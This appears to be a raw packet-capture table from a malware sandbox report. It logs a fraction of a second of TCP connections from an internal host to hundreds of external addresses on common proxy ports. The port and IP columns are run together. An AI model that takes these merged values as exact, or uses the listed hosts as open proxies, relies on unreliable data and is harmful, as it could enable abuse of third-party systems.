                                              Mar 11, 2024 08:37:18.256830931 CET502458811192.168.2.451.158.68.133
                                              Mar 11, 2024 08:37:18.256833076 CET5025531745192.168.2.4160.153.245.187
                                              Mar 11, 2024 08:37:18.256833076 CET5024634411192.168.2.4212.110.188.195
                                              Mar 11, 2024 08:37:18.256860018 CET502513128192.168.2.4156.239.53.141
                                              Mar 11, 2024 08:37:18.256861925 CET502488989192.168.2.4162.214.121.11
                                              Mar 11, 2024 08:37:18.258316040 CET510478080192.168.2.449.48.142.127
                                              Mar 11, 2024 08:37:18.259649038 CET510485678192.168.2.4103.121.62.2
                                              Mar 11, 2024 08:37:18.260257959 CET5104916379192.168.2.451.15.223.24
                                              Mar 11, 2024 08:37:18.260370970 CET805016720.205.61.143192.168.2.4
                                              Mar 11, 2024 08:37:18.261146069 CET909049855189.240.60.171192.168.2.4
                                              Mar 11, 2024 08:37:18.261543989 CET108050487203.19.38.114192.168.2.4
                                              Mar 11, 2024 08:37:18.261569023 CET108050487203.19.38.114192.168.2.4
                                              Mar 11, 2024 08:37:18.261620045 CET108050487203.19.38.114192.168.2.4
                                              Mar 11, 2024 08:37:18.261893988 CET504871080192.168.2.4203.19.38.114
                                              Mar 11, 2024 08:37:18.261949062 CET504871080192.168.2.4203.19.38.114
                                              Mar 11, 2024 08:37:18.265105009 CET28715028667.43.236.20192.168.2.4
                                              Mar 11, 2024 08:37:18.265773058 CET31285056877.77.64.116192.168.2.4
                                              Mar 11, 2024 08:37:18.267997980 CET41455064172.210.252.137192.168.2.4
                                              Mar 11, 2024 08:37:18.268004894 CET41455064172.210.252.137192.168.2.4
                                              Mar 11, 2024 08:37:18.268013000 CET80503078.210.58.56192.168.2.4
                                              Mar 11, 2024 08:37:18.270872116 CET2278550987198.12.255.193192.168.2.4
                                              Mar 11, 2024 08:37:18.270915031 CET510504145192.168.2.472.210.252.137
                                              Mar 11, 2024 08:37:18.270987988 CET5098722785192.168.2.4198.12.255.193
                                              Mar 11, 2024 08:37:18.271308899 CET5098722785192.168.2.4198.12.255.193
                                              Mar 11, 2024 08:37:18.272144079 CET31285097338.162.20.74192.168.2.4
                                              Mar 11, 2024 08:37:18.272254944 CET509733128192.168.2.438.162.20.74
                                              Mar 11, 2024 08:37:18.272425890 CET50253999192.168.2.4201.71.3.52
                                              Mar 11, 2024 08:37:18.272427082 CET5024931623192.168.2.478.128.81.220
                                              Mar 11, 2024 08:37:18.272427082 CET4992280192.168.2.450.145.6.36
                                              Mar 11, 2024 08:37:18.272429943 CET502474145192.168.2.4101.109.80.117
                                              Mar 11, 2024 08:37:18.272429943 CET5025980192.168.2.4142.11.222.22
                                              Mar 11, 2024 08:37:18.272439003 CET502561981192.168.2.441.254.53.70
                                              Mar 11, 2024 08:37:18.272447109 CET502644145192.168.2.491.185.236.239
                                              Mar 11, 2024 08:37:18.272447109 CET5026312334192.168.2.4194.4.50.91
                                              Mar 11, 2024 08:37:18.272456884 CET5037660956192.168.2.4212.83.142.145
                                              Mar 11, 2024 08:37:18.272456884 CET502658080192.168.2.4200.55.249.135
                                              Mar 11, 2024 08:37:18.272461891 CET4992539319192.168.2.4173.255.202.28
                                              Mar 11, 2024 08:37:18.272461891 CET502603629192.168.2.4182.52.108.58
                                              Mar 11, 2024 08:37:18.272461891 CET5026959421192.168.2.445.81.232.17
                                              Mar 11, 2024 08:37:18.272777081 CET509733128192.168.2.438.162.20.74
                                              Mar 11, 2024 08:37:18.273963928 CET5105155290192.168.2.4177.73.248.26
                                              Mar 11, 2024 08:37:18.274132967 CET41454985372.206.181.103192.168.2.4
                                              Mar 11, 2024 08:37:18.274379015 CET41454985372.206.181.103192.168.2.4
                                              Mar 11, 2024 08:37:18.276261091 CET510524145192.168.2.472.206.181.103
                                              Mar 11, 2024 08:37:18.278297901 CET804977950.168.72.112192.168.2.4
                                              Mar 11, 2024 08:37:18.278706074 CET99949846177.234.194.226192.168.2.4
                                              Mar 11, 2024 08:37:18.280211926 CET5105480192.168.2.450.204.219.224
                                              Mar 11, 2024 08:37:18.280772924 CET805031758.234.116.197192.168.2.4
                                              Mar 11, 2024 08:37:18.281045914 CET510554145192.168.2.472.210.208.101
                                              Mar 11, 2024 08:37:18.281296015 CET5108049780159.65.253.201192.168.2.4
                                              Mar 11, 2024 08:37:18.281644106 CET312850116185.123.101.174192.168.2.4
                                              Mar 11, 2024 08:37:18.281673908 CET510563128192.168.2.4104.252.131.6
                                              Mar 11, 2024 08:37:18.281816006 CET5105780192.168.2.4172.67.242.194
                                              Mar 11, 2024 08:37:18.281855106 CET91515011889.111.133.217192.168.2.4
                                              Mar 11, 2024 08:37:18.282510996 CET10805051023.19.244.109192.168.2.4
                                              Mar 11, 2024 08:37:18.282543898 CET5105919404192.168.2.4192.111.139.163
                                              Mar 11, 2024 08:37:18.282553911 CET510581080192.168.2.413.234.24.116
                                              Mar 11, 2024 08:37:18.282995939 CET5106053281192.168.2.4179.60.240.69
                                              Mar 11, 2024 08:37:18.283227921 CET5106124650192.168.2.464.90.48.27
                                              Mar 11, 2024 08:37:18.283253908 CET10805098823.19.244.109192.168.2.4
                                              Mar 11, 2024 08:37:18.283355951 CET509881080192.168.2.423.19.244.109
                                              Mar 11, 2024 08:37:18.283544064 CET509881080192.168.2.423.19.244.109
                                              Mar 11, 2024 08:37:18.283595085 CET510628080192.168.2.467.205.190.164
                                              Mar 11, 2024 08:37:18.283884048 CET5106359045192.168.2.4164.92.237.188
                                              Mar 11, 2024 08:37:18.284095049 CET31285015735.79.120.242192.168.2.4
                                              Mar 11, 2024 08:37:18.284110069 CET5106457327192.168.2.4207.180.198.241
                                              Mar 11, 2024 08:37:18.287204981 CET414551011184.181.217.210192.168.2.4
                                              Mar 11, 2024 08:37:18.288027048 CET5040425675192.168.2.492.204.134.38
                                              Mar 11, 2024 08:37:18.288037062 CET5026115673192.168.2.443.155.142.116
                                              Mar 11, 2024 08:37:18.288058996 CET502735678192.168.2.4103.4.118.130
                                              Mar 11, 2024 08:37:18.288060904 CET5046036181192.168.2.469.61.200.104
                                              Mar 11, 2024 08:37:18.288063049 CET5037741491192.168.2.4167.172.109.12
                                              Mar 11, 2024 08:37:18.288063049 CET503868080192.168.2.4153.139.233.218
                                              Mar 11, 2024 08:37:18.288079023 CET502688080192.168.2.479.110.119.177
                                              Mar 11, 2024 08:37:18.288079023 CET5027854571192.168.2.4139.59.6.54
                                              Mar 11, 2024 08:37:18.288090944 CET502778081192.168.2.4103.105.55.51
                                              Mar 11, 2024 08:37:18.288090944 CET497628080192.168.2.492.118.132.125
                                              Mar 11, 2024 08:37:18.288090944 CET5027132650192.168.2.4197.248.86.237
                                              Mar 11, 2024 08:37:18.288263083 CET510114145192.168.2.4184.181.217.210
                                              Mar 11, 2024 08:37:18.289577007 CET99950549190.69.157.213192.168.2.4
                                              Mar 11, 2024 08:37:18.289586067 CET4551750142176.31.110.126192.168.2.4
                                              Mar 11, 2024 08:37:18.290002108 CET50549999192.168.2.4190.69.157.213
                                              Mar 11, 2024 08:37:18.290345907 CET805093950.169.23.170192.168.2.4
                                              Mar 11, 2024 08:37:18.291414022 CET976450983162.243.102.207192.168.2.4
                                              Mar 11, 2024 08:37:18.291512966 CET509839764192.168.2.4162.243.102.207
                                              Mar 11, 2024 08:37:18.291718960 CET509839764192.168.2.4162.243.102.207
                                              Mar 11, 2024 08:37:18.292331934 CET808050729159.203.61.169192.168.2.4
                                              Mar 11, 2024 08:37:18.294794083 CET108050104114.7.161.18192.168.2.4
                                              Mar 11, 2024 08:37:18.294920921 CET10805086815.207.35.241192.168.2.4
                                              Mar 11, 2024 08:37:18.295018911 CET8050735172.67.181.129192.168.2.4
                                              Mar 11, 2024 08:37:18.295079947 CET508681080192.168.2.415.207.35.241
                                              Mar 11, 2024 08:37:18.295295000 CET508681080192.168.2.415.207.35.241
                                              Mar 11, 2024 08:37:18.295829058 CET805093450.174.214.221192.168.2.4
                                              Mar 11, 2024 08:37:18.297465086 CET148885092193.190.141.102192.168.2.4
                                              Mar 11, 2024 08:37:18.297580004 CET5092114888192.168.2.493.190.141.102
                                              Mar 11, 2024 08:37:18.297718048 CET1407649988148.72.206.250192.168.2.4
                                              Mar 11, 2024 08:37:18.297825098 CET4998814076192.168.2.4148.72.206.250
                                              Mar 11, 2024 08:37:18.298038006 CET5092114888192.168.2.493.190.141.102
                                              Mar 11, 2024 08:37:18.298069000 CET4998814076192.168.2.4148.72.206.250
                                              Mar 11, 2024 08:37:18.299159050 CET80503078.210.58.56192.168.2.4
                                              Mar 11, 2024 08:37:18.299767017 CET8050896172.67.182.169192.168.2.4
                                              Mar 11, 2024 08:37:18.299808025 CET8050896172.67.182.169192.168.2.4
                                              Mar 11, 2024 08:37:18.300040007 CET5089680192.168.2.4172.67.182.169
                                              Mar 11, 2024 08:37:18.301203966 CET8050896172.67.182.169192.168.2.4
                                              Mar 11, 2024 08:37:18.301213980 CET414551009142.54.235.9192.168.2.4
                                              Mar 11, 2024 08:37:18.301417112 CET5089680192.168.2.4172.67.182.169
                                              Mar 11, 2024 08:37:18.302176952 CET297965090454.36.122.16192.168.2.4
                                              Mar 11, 2024 08:37:18.302448988 CET5090429796192.168.2.454.36.122.16
                                              Mar 11, 2024 08:37:18.302633047 CET811850935149.210.235.107192.168.2.4
                                              Mar 11, 2024 08:37:18.302788973 CET5090429796192.168.2.454.36.122.16
                                              Mar 11, 2024 08:37:18.302859068 CET509358118192.168.2.4149.210.235.107
                                              Mar 11, 2024 08:37:18.303148985 CET509358118192.168.2.4149.210.235.107
                                              Mar 11, 2024 08:37:18.303556919 CET41455069568.1.210.163192.168.2.4
                                              Mar 11, 2024 08:37:18.303644896 CET312850906144.91.106.93192.168.2.4
                                              Mar 11, 2024 08:37:18.303688049 CET503808008192.168.2.4145.239.81.129
                                              Mar 11, 2024 08:37:18.303688049 CET5027956252192.168.2.4103.59.190.209
                                              Mar 11, 2024 08:37:18.303688049 CET50297999192.168.2.467.73.245.205
                                              Mar 11, 2024 08:37:18.303697109 CET5045239789192.168.2.4209.142.64.219
                                              Mar 11, 2024 08:37:18.303697109 CET502929002192.168.2.4218.23.15.154
                                              Mar 11, 2024 08:37:18.303699017 CET50280999192.168.2.4204.157.251.169
                                              Mar 11, 2024 08:37:18.303721905 CET502958080192.168.2.4182.253.181.10
                                              Mar 11, 2024 08:37:18.303752899 CET502855678192.168.2.4103.154.230.112
                                              Mar 11, 2024 08:37:18.303752899 CET5028853749192.168.2.4171.244.140.160
                                              Mar 11, 2024 08:37:18.303805113 CET41455069568.1.210.163192.168.2.4
                                              Mar 11, 2024 08:37:18.306339025 CET1080498525.180.19.163192.168.2.4
                                              Mar 11, 2024 08:37:18.306346893 CET1080498525.180.19.163192.168.2.4
                                              Mar 11, 2024 08:37:18.306380987 CET510684145192.168.2.468.1.210.163
                                              Mar 11, 2024 08:37:18.306423903 CET498521080192.168.2.45.180.19.163
                                              Mar 11, 2024 08:37:18.306777954 CET5106962030192.168.2.4209.126.1.101
                                              Mar 11, 2024 08:37:18.307106972 CET498521080192.168.2.45.180.19.163
                                              Mar 11, 2024 08:37:18.307583094 CET805022750.174.145.11192.168.2.4
                                              Mar 11, 2024 08:37:18.307923079 CET414550469103.200.135.229192.168.2.4
                                              Mar 11, 2024 08:37:18.308057070 CET5107052593192.168.2.437.187.77.58
                                              Mar 11, 2024 08:37:18.308115005 CET414550469103.200.135.229192.168.2.4
                                              Mar 11, 2024 08:37:18.308329105 CET8049887147.75.92.251192.168.2.4
                                              Mar 11, 2024 08:37:18.309470892 CET312850012170.81.131.70192.168.2.4
                                              Mar 11, 2024 08:37:18.309526920 CET510714145192.168.2.4103.200.135.229
                                              Mar 11, 2024 08:37:18.309680939 CET500123128192.168.2.4170.81.131.70
                                              Mar 11, 2024 08:37:18.310133934 CET8050912104.23.100.73192.168.2.4
                                              Mar 11, 2024 08:37:18.310142040 CET8050912104.23.100.73192.168.2.4
                                              Mar 11, 2024 08:37:18.310182095 CET500123128192.168.2.4170.81.131.70
                                              Mar 11, 2024 08:37:18.310477018 CET5091280192.168.2.4104.23.100.73
                                              Mar 11, 2024 08:37:18.310848951 CET8050912104.23.100.73192.168.2.4
                                              Mar 11, 2024 08:37:18.310921907 CET5091280192.168.2.4104.23.100.73
                                              Mar 11, 2024 08:37:18.311398029 CET4954750979174.77.111.198192.168.2.4
                                              Mar 11, 2024 08:37:18.311431885 CET510721981192.168.2.4217.52.247.86
                                              Mar 11, 2024 08:37:18.311481953 CET5097949547192.168.2.4174.77.111.198
                                              Mar 11, 2024 08:37:18.311932087 CET5097949547192.168.2.4174.77.111.198
                                              Mar 11, 2024 08:37:18.312233925 CET510734153192.168.2.4202.43.182.3
                                              Mar 11, 2024 08:37:18.312728882 CET5107480192.168.2.4104.23.126.8
                                              Mar 11, 2024 08:37:18.313720942 CET312850922144.91.118.176192.168.2.4
                                              Mar 11, 2024 08:37:18.316283941 CET4988780192.168.2.4147.75.92.251
                                              Mar 11, 2024 08:37:18.317404032 CET41454988672.195.34.42192.168.2.4
                                              Mar 11, 2024 08:37:18.317411900 CET41454988672.195.34.42192.168.2.4
                                              Mar 11, 2024 08:37:18.318243027 CET66665014191.226.240.58192.168.2.4
                                              Mar 11, 2024 08:37:18.318288088 CET8050459103.120.6.46192.168.2.4
                                              Mar 11, 2024 08:37:18.318296909 CET510754145192.168.2.472.195.34.42
                                              Mar 11, 2024 08:37:18.318451881 CET8050459103.120.6.46192.168.2.4
                                              Mar 11, 2024 08:37:18.319267988 CET501995401192.168.2.491.134.140.160
                                              Mar 11, 2024 08:37:18.319267988 CET505008889192.168.2.4216.176.187.99
                                              Mar 11, 2024 08:37:18.319289923 CET88885054031.43.158.108192.168.2.4
                                              Mar 11, 2024 08:37:18.319297075 CET5029362952192.168.2.4104.248.158.78
                                              Mar 11, 2024 08:37:18.319298029 CET5018812217192.168.2.491.134.140.160
                                              Mar 11, 2024 08:37:18.319314003 CET502908291192.168.2.4164.163.21.14
                                              Mar 11, 2024 08:37:18.319314003 CET5030915755192.168.2.431.200.242.201
                                              Mar 11, 2024 08:37:18.319314957 CET5029631106192.168.2.4172.105.52.78
                                              Mar 11, 2024 08:37:18.319314957 CET5047617125192.168.2.467.43.228.253
                                              Mar 11, 2024 08:37:18.319315910 CET497655678192.168.2.4171.39.31.66
                                              Mar 11, 2024 08:37:18.319314957 CET502918080192.168.2.4188.132.222.5
                                              Mar 11, 2024 08:37:18.319315910 CET4985980192.168.2.450.223.239.166
                                              Mar 11, 2024 08:37:18.319324017 CET503038080192.168.2.4181.212.45.226
                                              Mar 11, 2024 08:37:18.319336891 CET5030050564192.168.2.4164.92.86.113
                                              Mar 11, 2024 08:37:18.319336891 CET502998089192.168.2.4113.223.214.1
                                              Mar 11, 2024 08:37:18.319366932 CET505408888192.168.2.431.43.158.108
                                              Mar 11, 2024 08:37:18.319628000 CET505408888192.168.2.431.43.158.108
                                              Mar 11, 2024 08:37:18.319812059 CET5045980192.168.2.4103.120.6.46
                                              Mar 11, 2024 08:37:18.320075035 CET8050656119.196.168.183192.168.2.4
                                              Mar 11, 2024 08:37:18.320235968 CET5065680192.168.2.4119.196.168.183
                                              Mar 11, 2024 08:37:18.320394039 CET5065680192.168.2.4119.196.168.183
                                              Mar 11, 2024 08:37:18.320470095 CET80509488.210.58.56192.168.2.4
                                              Mar 11, 2024 08:37:18.320544004 CET5094880192.168.2.48.210.58.56
                                              Mar 11, 2024 08:37:18.320837975 CET510768888192.168.2.431.43.158.108
                                              Mar 11, 2024 08:37:18.321263075 CET5107780192.168.2.4119.196.168.183
                                              Mar 11, 2024 08:37:18.321322918 CET5094880192.168.2.48.210.58.56
                                              Mar 11, 2024 08:37:18.321676016 CET510788585192.168.2.4159.65.77.168
                                              Mar 11, 2024 08:37:18.322108030 CET6666500271.85.33.94192.168.2.4
                                              Mar 11, 2024 08:37:18.322228909 CET8050656119.196.168.183192.168.2.4
                                              Mar 11, 2024 08:37:18.322429895 CET500276666192.168.2.41.85.33.94
                                              Mar 11, 2024 08:37:18.322429895 CET500276666192.168.2.41.85.33.94
                                              Mar 11, 2024 08:37:18.323230028 CET20060506035.196.111.30192.168.2.4
                                              Mar 11, 2024 08:37:18.324306011 CET805031758.234.116.197192.168.2.4
                                              Mar 11, 2024 08:37:18.324851036 CET805057981.250.223.126192.168.2.4
                                              Mar 11, 2024 08:37:18.325669050 CET805065161.111.38.5192.168.2.4
                                              Mar 11, 2024 08:37:18.326601028 CET805095158.234.116.197192.168.2.4
                                              Mar 11, 2024 08:37:18.326778889 CET5095180192.168.2.458.234.116.197
                                              Mar 11, 2024 08:37:18.326836109 CET805065161.111.38.5192.168.2.4
                                              Mar 11, 2024 08:37:18.326849937 CET805065161.111.38.5192.168.2.4
                                              Mar 11, 2024 08:37:18.326940060 CET5065180192.168.2.461.111.38.5
                                              Mar 11, 2024 08:37:18.327064991 CET5095180192.168.2.458.234.116.197
                                              Mar 11, 2024 08:37:18.327358007 CET5065180192.168.2.461.111.38.5
                                              Mar 11, 2024 08:37:18.328226089 CET805084280.228.235.6192.168.2.4
                                              Mar 11, 2024 08:37:18.330257893 CET31285100538.162.29.213192.168.2.4
                                              Mar 11, 2024 08:37:18.330382109 CET510053128192.168.2.438.162.29.213
                                              Mar 11, 2024 08:37:18.331170082 CET510053128192.168.2.438.162.29.213
                                              Mar 11, 2024 08:37:18.332093954 CET312850573160.16.90.35192.168.2.4
                                              Mar 11, 2024 08:37:18.332747936 CET414550995174.75.211.222192.168.2.4
                                              Mar 11, 2024 08:37:18.334671974 CET50885095888.99.138.21192.168.2.4
                                              Mar 11, 2024 08:37:18.334903955 CET509585088192.168.2.488.99.138.21
                                              Mar 11, 2024 08:37:18.334903955 CET503148080192.168.2.4185.118.153.110
                                              Mar 11, 2024 08:37:18.334924936 CET5031919132192.168.2.4222.252.18.8
                                              Mar 11, 2024 08:37:18.334927082 CET501573128192.168.2.435.79.120.242
                                              Mar 11, 2024 08:37:18.334927082 CET5030416379192.168.2.4163.172.129.251
                                              Mar 11, 2024 08:37:18.334947109 CET509954145192.168.2.4174.75.211.222
                                              Mar 11, 2024 08:37:18.334947109 CET504413128192.168.2.485.62.218.250
                                              Mar 11, 2024 08:37:18.334947109 CET5037046051192.168.2.4125.253.125.132
                                              Mar 11, 2024 08:37:18.334949017 CET503235678192.168.2.4192.141.236.3
                                              Mar 11, 2024 08:37:18.334949017 CET503203128192.168.2.4156.239.50.63
                                              Mar 11, 2024 08:37:18.334949017 CET5052080192.168.2.450.207.199.83
                                              Mar 11, 2024 08:37:18.334954023 CET5032126927192.168.2.492.204.135.37
                                              Mar 11, 2024 08:37:18.335074902 CET503168080192.168.2.4194.247.173.17
                                              Mar 11, 2024 08:37:18.335097075 CET509954145192.168.2.4174.75.211.222
                                              Mar 11, 2024 08:37:18.335438967 CET509585088192.168.2.488.99.138.21
                                              Mar 11, 2024 08:37:18.335585117 CET80805005454.37.196.189192.168.2.4
                                              Mar 11, 2024 08:37:18.335659981 CET500548080192.168.2.454.37.196.189
                                              Mar 11, 2024 08:37:18.335952997 CET500548080192.168.2.454.37.196.189
                                              Mar 11, 2024 08:37:18.336776972 CET379204982837.187.77.58192.168.2.4
                                              Mar 11, 2024 08:37:18.337177992 CET805098150.173.140.148192.168.2.4
                                              Mar 11, 2024 08:37:18.338700056 CET81235017820.24.43.214192.168.2.4
                                              Mar 11, 2024 08:37:18.339884996 CET8050676121.159.146.251192.168.2.4
                                              Mar 11, 2024 08:37:18.339993000 CET5067680192.168.2.4121.159.146.251
                                              Mar 11, 2024 08:37:18.340068102 CET5067680192.168.2.4121.159.146.251
                                              Mar 11, 2024 08:37:18.340409040 CET60304998346.100.106.242192.168.2.4
                                              Mar 11, 2024 08:37:18.340787888 CET499836030192.168.2.446.100.106.242
                                              Mar 11, 2024 08:37:18.340852022 CET5107980192.168.2.4121.159.146.251
                                              Mar 11, 2024 08:37:18.341901064 CET20060506035.196.111.30192.168.2.4
                                              Mar 11, 2024 08:37:18.341967106 CET499836030192.168.2.446.100.106.242
                                              Mar 11, 2024 08:37:18.341970921 CET20060506035.196.111.30192.168.2.4
                                              Mar 11, 2024 08:37:18.342004061 CET5060320060192.168.2.45.196.111.30
                                              Mar 11, 2024 08:37:18.342541933 CET88885097089.46.249.148192.168.2.4
                                              Mar 11, 2024 08:37:18.343493938 CET88885054031.43.158.108192.168.2.4
                                              Mar 11, 2024 08:37:18.343606949 CET509708888192.168.2.489.46.249.148
                                              Mar 11, 2024 08:37:18.344062090 CET509708888192.168.2.489.46.249.148
                                              Mar 11, 2024 08:37:18.345752001 CET5092050021194.31.79.75192.168.2.4
                                              Mar 11, 2024 08:37:18.345863104 CET5002150920192.168.2.4194.31.79.75
                                              Mar 11, 2024 08:37:18.346100092 CET5002150920192.168.2.4194.31.79.75
                                              Mar 11, 2024 08:37:18.346297979 CET5108020060192.168.2.45.196.111.30
                                              Mar 11, 2024 08:37:18.347961903 CET2312850938178.128.113.118192.168.2.4
                                              Mar 11, 2024 08:37:18.348108053 CET5093823128192.168.2.4178.128.113.118
                                              Mar 11, 2024 08:37:18.348637104 CET5093823128192.168.2.4178.128.113.118
                                              Mar 11, 2024 08:37:18.348675013 CET8050676121.159.146.251192.168.2.4
                                              Mar 11, 2024 08:37:18.349826097 CET510813629192.168.2.481.12.104.36
                                              Mar 11, 2024 08:37:18.350539923 CET502378879192.168.2.491.134.140.160
                                              Mar 11, 2024 08:37:18.350539923 CET4993027149192.168.2.467.43.227.226
                                              Mar 11, 2024 08:37:18.350559950 CET5028710102192.168.2.483.220.168.57
                                              Mar 11, 2024 08:37:18.350564957 CET503688080192.168.2.4180.183.69.89
                                              Mar 11, 2024 08:37:18.350568056 CET5031580192.168.2.4198.168.189.54
                                              Mar 11, 2024 08:37:18.350574970 CET504203366192.168.2.4212.5.143.42
                                              Mar 11, 2024 08:37:18.350574970 CET504104153192.168.2.491.225.170.25
                                              Mar 11, 2024 08:37:18.350744009 CET80805101067.22.28.62192.168.2.4
                                              Mar 11, 2024 08:37:18.350827932 CET80005041424.144.95.218192.168.2.4
                                              Mar 11, 2024 08:37:18.353247881 CET31285101638.162.25.62192.168.2.4
                                              Mar 11, 2024 08:37:18.353368998 CET510163128192.168.2.438.162.25.62
                                              Mar 11, 2024 08:37:18.353985071 CET8050778104.25.42.178192.168.2.4
                                              Mar 11, 2024 08:37:18.354020119 CET510163128192.168.2.438.162.25.62
                                              Mar 11, 2024 08:37:18.354082108 CET8050755172.67.254.127192.168.2.4
                                              Mar 11, 2024 08:37:18.354319096 CET31285088638.162.1.90192.168.2.4
                                              Mar 11, 2024 08:37:18.355279922 CET346334981666.29.128.241192.168.2.4
                                              Mar 11, 2024 08:37:18.355676889 CET805026650.174.216.104192.168.2.4
                                              Mar 11, 2024 08:37:18.357085943 CET8050803104.27.26.29192.168.2.4
                                              Mar 11, 2024 08:37:18.357815027 CET8050740203.30.191.218192.168.2.4
                                              Mar 11, 2024 08:37:18.358144045 CET8050814104.19.171.188192.168.2.4
                                              Mar 11, 2024 08:37:18.358728886 CET8050809104.20.198.49192.168.2.4
                                              Mar 11, 2024 08:37:18.359236956 CET31285057562.33.53.248192.168.2.4
                                              Mar 11, 2024 08:37:18.359287977 CET8050824104.25.167.88192.168.2.4
                                              Mar 11, 2024 08:37:18.359343052 CET8050822172.67.181.11192.168.2.4
                                              Mar 11, 2024 08:37:18.360029936 CET8050389103.153.154.6192.168.2.4
                                              Mar 11, 2024 08:37:18.360059023 CET8050389103.153.154.6192.168.2.4
                                              Mar 11, 2024 08:37:18.360405922 CET5038980192.168.2.4103.153.154.6
                                              Mar 11, 2024 08:37:18.361478090 CET5108280192.168.2.4156.67.214.232
                                              Mar 11, 2024 08:37:18.361706018 CET909049855189.240.60.171192.168.2.4
                                              Mar 11, 2024 08:37:18.361895084 CET8050783188.114.99.37192.168.2.4
                                              Mar 11, 2024 08:37:18.361953020 CET510831337192.168.2.4103.239.200.226
                                              Mar 11, 2024 08:37:18.361985922 CET80885095547.106.76.196192.168.2.4
                                              Mar 11, 2024 08:37:18.362365007 CET498559090192.168.2.4189.240.60.171
                                              Mar 11, 2024 08:37:18.362478971 CET509558088192.168.2.447.106.76.196
                                              Mar 11, 2024 08:37:18.362646103 CET509558088192.168.2.447.106.76.196
                                              Mar 11, 2024 08:37:18.362828016 CET804988450.207.199.86192.168.2.4
                                              Mar 11, 2024 08:37:18.363390923 CET510848080192.168.2.4103.243.114.206
                                              Mar 11, 2024 08:37:18.363878965 CET510853128192.168.2.438.162.0.36
                                              Mar 11, 2024 08:37:18.364424944 CET510863128192.168.2.43.90.100.12
                                              Mar 11, 2024 08:37:18.364582062 CET81925062731.211.130.237192.168.2.4
                                              Mar 11, 2024 08:37:18.364589930 CET81925062731.211.130.237192.168.2.4
                                              Mar 11, 2024 08:37:18.364689112 CET909150550120.37.121.209192.168.2.4
                                              Mar 11, 2024 08:37:18.365480900 CET909150550120.37.121.209192.168.2.4
                                              Mar 11, 2024 08:37:18.365550995 CET909150550120.37.121.209192.168.2.4
                                              Mar 11, 2024 08:37:18.365629911 CET505509091192.168.2.4120.37.121.209
                                              Mar 11, 2024 08:37:18.365629911 CET505509091192.168.2.4120.37.121.209
                                              Mar 11, 2024 08:37:18.365971088 CET510878192192.168.2.431.211.130.237
                                              Mar 11, 2024 08:37:18.366162062 CET5001580192.168.2.450.231.104.58
                                              Mar 11, 2024 08:37:18.366163969 CET4977642580192.168.2.4175.139.179.65
                                              Mar 11, 2024 08:37:18.366303921 CET505509091192.168.2.4120.37.121.209
                                              Mar 11, 2024 08:37:18.367945910 CET50005090949.228.131.169192.168.2.4
                                              Mar 11, 2024 08:37:18.368330002 CET509095000192.168.2.449.228.131.169
                                              Mar 11, 2024 08:37:18.368616104 CET509095000192.168.2.449.228.131.169
                                              Mar 11, 2024 08:37:18.369240999 CET590405007834.79.91.3192.168.2.4
                                              Mar 11, 2024 08:37:18.369405031 CET5007859040192.168.2.434.79.91.3
                                              Mar 11, 2024 08:37:18.370388031 CET5007859040192.168.2.434.79.91.3
                                              Mar 11, 2024 08:37:18.371336937 CET912350989173.249.29.243192.168.2.4
                                              Mar 11, 2024 08:37:18.371520042 CET509899123192.168.2.4173.249.29.243
                                              Mar 11, 2024 08:37:18.371840954 CET509899123192.168.2.4173.249.29.243
                                              Mar 11, 2024 08:37:18.372452021 CET56785095989.191.237.89192.168.2.4
                                              Mar 11, 2024 08:37:18.372545958 CET510888080192.168.2.4180.183.1.84
                                              Mar 11, 2024 08:37:18.373035908 CET510898080192.168.2.4181.114.224.141
                                              Mar 11, 2024 08:37:18.373222113 CET577285084170.166.167.38192.168.2.4
                                              Mar 11, 2024 08:37:18.373492002 CET577285084170.166.167.38192.168.2.4
                                              Mar 11, 2024 08:37:18.374723911 CET5109057728192.168.2.470.166.167.38
                                              Mar 11, 2024 08:37:18.375715971 CET808050572103.118.47.243192.168.2.4
                                              Mar 11, 2024 08:37:18.375785112 CET505728080192.168.2.4103.118.47.243
                                              Mar 11, 2024 08:37:18.376039028 CET505728080192.168.2.4103.118.47.243
                                              Mar 11, 2024 08:37:18.376826048 CET510918080192.168.2.4103.118.47.243
                                              Mar 11, 2024 08:37:18.379183054 CET808050572103.118.47.243192.168.2.4
                                              Mar 11, 2024 08:37:18.379215002 CET1428750373192.252.208.67192.168.2.4
                                              Mar 11, 2024 08:37:18.379224062 CET312850272134.209.29.120192.168.2.4
                                              Mar 11, 2024 08:37:18.379376888 CET502723128192.168.2.4134.209.29.120
                                              Mar 11, 2024 08:37:18.379584074 CET502723128192.168.2.4134.209.29.120
                                              Mar 11, 2024 08:37:18.381249905 CET414550144202.40.188.201192.168.2.4
                                              Mar 11, 2024 08:37:18.381788969 CET4990680192.168.2.450.172.39.98
                                              Mar 11, 2024 08:37:18.381820917 CET4987880192.168.2.450.174.214.220
                                              Mar 11, 2024 08:37:18.381844997 CET498481080192.168.2.443.155.185.36
                                              Mar 11, 2024 08:37:18.382353067 CET567850446203.112.134.74192.168.2.4
                                              Mar 11, 2024 08:37:18.383210897 CET10805017165.1.40.47192.168.2.4
                                              Mar 11, 2024 08:37:18.383450985 CET504465678192.168.2.4203.112.134.74
                                              Mar 11, 2024 08:37:18.383502960 CET504465678192.168.2.4203.112.134.74
                                              Mar 11, 2024 08:37:18.384079933 CET8050985185.162.228.128192.168.2.4
                                              Mar 11, 2024 08:37:18.384089947 CET8050985185.162.228.128192.168.2.4
                                              Mar 11, 2024 08:37:18.384309053 CET8050985185.162.228.128192.168.2.4
                                              Mar 11, 2024 08:37:18.384332895 CET510925678192.168.2.4203.112.134.74
                                              Mar 11, 2024 08:37:18.384392023 CET5098580192.168.2.4185.162.228.128
                                              Mar 11, 2024 08:37:18.384526014 CET5098580192.168.2.4185.162.228.128
                                              Mar 11, 2024 08:37:18.387676954 CET501711080192.168.2.465.1.40.47
                                              Mar 11, 2024 08:37:18.388876915 CET5109380192.168.2.4133.232.90.126
                                              Mar 11, 2024 08:37:18.388883114 CET414550138184.181.217.194192.168.2.4
                                              Mar 11, 2024 08:37:18.389089108 CET501384145192.168.2.4184.181.217.194
                                              Mar 11, 2024 08:37:18.389273882 CET501384145192.168.2.4184.181.217.194
                                              Mar 11, 2024 08:37:18.389529943 CET510943128192.168.2.4134.122.22.233
                                              Mar 11, 2024 08:37:18.389837027 CET5109516113192.168.2.437.187.73.7
                                              Mar 11, 2024 08:37:18.389909029 CET4909350971128.199.165.63192.168.2.4
                                              Mar 11, 2024 08:37:18.389918089 CET90505097685.143.213.2192.168.2.4
                                              Mar 11, 2024 08:37:18.389991045 CET5097149093192.168.2.4128.199.165.63
